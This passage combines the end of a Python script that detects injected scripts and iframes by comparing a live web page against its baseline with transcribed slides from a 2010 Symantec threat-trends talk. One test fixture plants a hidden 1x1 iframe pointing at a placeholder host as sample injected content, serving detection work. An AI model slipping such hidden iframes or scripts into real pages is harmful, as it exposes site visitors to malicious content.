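        if ref is not None:
            self.found.append((tag, ref))
        elif tag == "script":
            self._script_body = []  # inline script: hashed when </script> arrives
        else:
            self.found.append((tag, "<no-src>"))

    def handle_data(self, data):
        if self._script_body is not None:
            self._script_body.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._script_body is not None:
            body = _normalise("".join(self._script_body))
            digest = hashlib.sha256(body.encode("utf-8")).hexdigest()[:16]
            self.found.append(("script", "inline:" + digest))
            self._script_body = None


def page_digest(html: str) -> str:
    """SHA-256 of the whitespace-normalised page: the coarse 'did it change' signal."""
    return hashlib.sha256(_normalise(html).encode("utf-8")).hexdigest()


def active_elements(html: str):
    parser = _ActiveContentCollector()
    parser.feed(html)
    parser.close()
    return parser.found


def check_page(baseline_html: str, live_html: str) -> dict:
    """Compare a live page against its baseline.

    Reports whether the page changed at all and, more usefully, which active
    elements are new: a page that gained script or iframe references it never
    had is the classic sign of the injection the slide describes.
    """
    new_active = sorted(set(active_elements(live_html)) - set(active_elements(baseline_html)))
    return {
        "changed": page_digest(baseline_html) != page_digest(live_html),
        "new_active_elements": new_active,
        "suspicious": bool(new_active),
    }


# Constructed sample pages (placeholders, not real sites): the baseline as
# deployed, and a live copy into which a 1x1 iframe and an inline script were injected.
BASELINE_HTML = """<html><head><title>Ministry portal</title>
<script src="/static/app.js"></script></head>
<body><h1>Welcome</h1><p>Public services portal.</p></body></html>"""

INJECTED_HTML = BASELINE_HTML.replace(
    "</body>",
    '<iframe src="http://injected-content.example/" width="1" height="1"></iframe>'
    "<script>/* constructed injected script */</script></body>",
)

if __name__ == "__main__":
    print(check_page(BASELINE_HTML, BASELINE_HTML))
    print(check_page(BASELINE_HTML, INJECTED_HTML))
```

The whole-page hash only says that something changed, and a routine content edit changes it too; diffing the set of active elements is what separates an editorial update from injected content. In practice the baseline should come from the deployed build artefact and the live copy from a fetch made outside the web server, so a compromised origin cannot vouch for itself.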
  • 26. Vulnerability Trends – Browser plug-in vulnerabilities
    • Vulnerabilities in Web browser plug-ins are frequently exploited to install malicious software.
    • Memory corruption vulnerabilities again made up the majority of vulnerability types in browser plug-in technologies for 2008, with 272 vulnerabilities classified as such.
  • 27. Vulnerability Trends – Unpatched vulnerabilities by vendor
    • In 2008, there were 112 unpatched vulnerabilities affecting enterprise-class vendors, compared to 144 in 2007.
    • Microsoft had the most, with a total of 46 unpatched vulnerabilities.
    • Of the 112 unpatched enterprise vulnerabilities, 37 were low severity, 71 were medium severity, and 4 were high severity.
  • 28. Malicious Code Trends – Types
    • Trojans made up 68 percent of the volume of the top 50 malicious code samples reported in 2008, a minor decrease from 69 percent in 2007.
    • Worms increased slightly from 26% in 2007 to 29% in 2008.
    • The percentage of back doors decreased from 21% to 15% in the current period.
  • 29. Malicious Code Trends – Propagation mechanisms
    • 66% of potential malicious code infections propagated as shared executable files, up significantly from 44% in 2007.
    • Malicious code using P2P file-sharing protocols declined from 17% in 2007 to 10% in 2008.
  • 30. Spam – Country of Origin
    • Over the past year, Symantec observed a 192 percent increase in spam detected across the Internet as a whole, from 119.6 billion messages in 2007 to 349.6 billion in 2008.
    • In 2008, bot networks were responsible for the distribution of approximately 90 percent of all spam email.
    • Russia, Turkey, and Brazil experienced significant increases in spam volume this year.
  • 31. Spam Categories
    • Internet-related spam was the top category with 24%, followed by commercial product spam with 19%.
    • Financial spam relatively constant at 16%.
  • 32. An example of how users are exploited
    (Diagram of the phishing economy: Phisher, Cashier, Spammer, Fraud Website, Egg Drop Server (+ Trojan horse), Bot-Herder, Phishing Messages, Victims)
  • 34. Anatomy of a breach
    • Disruption of operations: large-scale DDoS attacks; defacing websites
    • Organized criminal; well-meaning insider; malicious insider
    • Malware outbreaks within protected perimeter
    • Stealthy exfiltration or unintended loss of confidential data
  • 35. Well-Meaning Insider – Breach Sources
    1. Data on servers & desktops
    2. Lost/stolen laptops, mobile devices
    3. Email, Web mail, removable devices
    4. Third-party data loss incidents
    5. Business processes
    (Diagram: Hacker, Desktop, Firewall, Server, Employee)
  • 36. Targeted Attacks
    1. Incursion: attacker breaks in via targeted malware, improper credentials or SQL injection
    2. Discovery: map organization's systems; automatically find confidential data
    3. Capture: access data on unprotected systems; install root kits to capture network data
    4. Exfiltration: confidential data sent to hacker team in the clear, wrapped in encrypted packets or in zipped files with passwords
  • 37. Malicious Insiders – Four Types
    1. White collar criminals
    2. Terminated employees
    3. Career builders
    4. Industrial spies
    (Diagram of an unhappy employee's channels past the firewall: home computer, IM, webmail, email, mobile device, CD/DVD, USB)
  • 39. Establishing In-depth Defense
    • Future government capabilities are built on interconnected systems and effective information sharing
    • Interconnected networks require in-depth, proactive & agile defense at the periphery and the endpoint of infrastructure
    • Traditional 'Bastion' security models do not effectively support such agile, interconnected networks and information
  • 40. Collecting intelligence – Real-time situation awareness: "What enables the wise sovereign and the good general to strike and conquer, and achieve things beyond the reach of ordinary men, is foreknowledge." – Sun Tzu, The Art of War
  • 41. Conficker/Downadup – Cumulative (chart; Source – Conficker Working Group and Shadowserver)
  • 42. How to Stop Security Breaches
    • Protect information proactively
    • Automate review of entitlements
    • Identify threats in real time
    • Integrate security operations
    • Prevent data exfiltration
    • Stop targeted attacks
  • 43. Thank you! Ilias_chantzos@symantec.com
    Copyright © 2010 Symantec Corporation. All rights reserved. Symantec and the Symantec Logo are trademarks or registered trademarks of Symantec Corporation or its affiliates in the U.S. and other countries. Other names may be trademarks of their respective owners. This document is provided for informational purposes only and is not intended as advertising. All warranties relating to the information in this document, either express or implied, are disclaimed to the maximum extent allowed by law. The information in this document is subject to change without notice.